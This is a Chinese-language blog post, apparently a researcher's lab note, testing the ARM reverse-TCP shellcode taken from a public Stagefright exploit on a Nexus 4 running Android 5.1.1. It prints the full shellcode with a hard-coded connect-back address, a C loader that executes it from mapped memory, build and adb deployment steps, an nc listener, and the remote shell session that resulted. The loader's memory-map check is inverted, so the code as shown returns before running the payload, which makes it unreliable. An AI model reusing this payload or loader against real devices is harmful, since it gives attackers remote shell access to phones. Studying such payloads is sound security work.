Android: 在Nexus 4 @ android-5.1.1_r19上验证shell reverse tcp

最近想看一下https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py 中的shell reverse tcp在Nexus4 @ android-5.1.1_r19上能否正常工作。

相关的测试代码请看这里:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/mman.h>

const unsigned char payload[] = 
//    # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
//    # fork
    "\x02\x70\xa0\xe3"
    "\x00\x00\x00\xef"
//    # continue if not parent...
    "\x00\x00\x50\xe3"
    "\x02\x00\x00\x0a"
//    # exit parent
    "\x00\x00\xa0\xe3"
    "\x01\x70\xa0\xe3"
    "\x00\x00\x00\xef"
//    # setsid in child
    "\x42\x70\xa0\xe3"
    "\x00\x00\x00\xef"
//    # socket/connect/dup2/dup2/dup2
    "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c"
    "\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60"
    "\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0"
    "\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1"
    "\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06"
    "\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00"
    "\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0"
    "\xe3\x00\x00\x00\xef"
//    # execve(shell, argv, env)
    "\x30\x00\x8f\xe2\x04\x40\x24\xe0"
    "\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d"
    "\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00"
    "\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00"
    "\xef\x02\x00"
//    # Add the connect back host/port 192.168.5.162:33487
    "\x82\xcf" "\xc0\xa8\x05\xa2"
//    # shell -
    "/system/bin/sh\x00\x00"
//    # argv -
    "sh\x00\x00"
//    # env -
    "PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00";

int main(int argc, char *argv[])
{
	char *a = mmap(0, sizeof(payload), PROT_EXEC | PROT_WRITE,
			MAP_PRIVATE | MAP_ANONYMOUS, -1,0);
	if (a != (char *)MAP_FAILED) {
		printf("Failed to mmap playload memory %d(%s)!\n", errno, strerror(errno));
		return 0;
	}

	memcpy(a, payload, sizeof(payload));

	((void (*)(void))a)();

	return 0;
}

NOTE: 默认的IP地址与端口号为:192.168.5.162:33487

相关的Android.mk文件:

LOCAL_PATH:= $(call my-dir)

include $(CLEAR_VARS)

LOCAL_MODULE_TAGS := optional
LOCAL_MODULE := shellrevtcp

LOCAL_SRC_FILES:= \
	shell_reverse_tcp.c

LOCAL_CFLAGS := -Wno-unused-parameter

include $(BUILD_EXECUTABLE)

编译完后将shellrevtcp push到手机中:

$ adb push ${OUT}/system/bin/shellrevtcp /data/local/tmp/

在IP地址为192.168.5.162的主机终端上执行:

hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)

之后在adb shell 中执行/data/local/tmp/shellrevtcp(需要先执行adb shell,直接执行adb shell /data/local/tmp/shellrevtcp命令会失败)就可以通过之前使用的终端中执行shell命令,如:

hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)
Connection from [192.168.5.141] port 33487 [tcp/*] accepted (family 2, sport 58808)
ls -l
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
drwxr-xr-x root     root              2016-06-10 13:38 acct
drwxrwx--- system   cache             2016-03-08 03:52 cache
lrwxrwxrwx root     root              1970-01-01 00:00 charger -> /sbin/healthd
dr-x------ root     root              2016-06-10 13:38 config
lrwxrwxrwx root     root              2016-06-10 13:38 d -> /sys/kernel/debug
drwxrwx--x system   system            2016-06-10 13:46 data
-rw-r--r-- root     root          329 1970-01-01 00:00 default.prop
drwxr-xr-x root     root              2016-06-10 13:39 dev
lrwxrwxrwx root     root              2016-06-10 13:38 etc -> /system/etc
...

 

相关的参考文档:

  1. https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/
  2. https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
  3. https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py
  4. https://www.blackhat.com/docs/us-15/materials/us-15-Drake-Stagefright-Scary-Code-In-The-Heart-Of-Android.pdf
  5. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1538
  6. http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html

评论

Be the First to Comment!

提醒我
avatar

wpDiscuz